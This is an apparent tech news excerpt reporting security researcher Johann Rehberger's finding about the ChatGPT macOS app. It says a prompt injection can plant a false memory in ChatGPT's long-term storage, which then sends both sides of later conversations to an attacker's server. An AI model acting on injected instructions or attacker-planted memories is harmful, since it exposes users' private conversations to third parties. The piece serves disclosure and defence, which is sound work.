Connect with us

Tech

Hacker creates false memories in ChatGPT to steal victim data — but it might not be as bad as it sounds

Published

on

Security researchers have exposed a vulnerability which could allow threat actors to store malicious instructions in a user’s memory settings in the ChatGPT MacOS app.

A report from Johann Rehberger at Embrace The Red noted how an attacker could trigger a prompt injection to take control of ChatGPT, and can then insert a memory into its long-term storage and persistence mechanism. This leads to the exfiltration of the conversation on both sides straight to the attacker’s server.


Advertisement
Continue Reading
Advertisement

Trending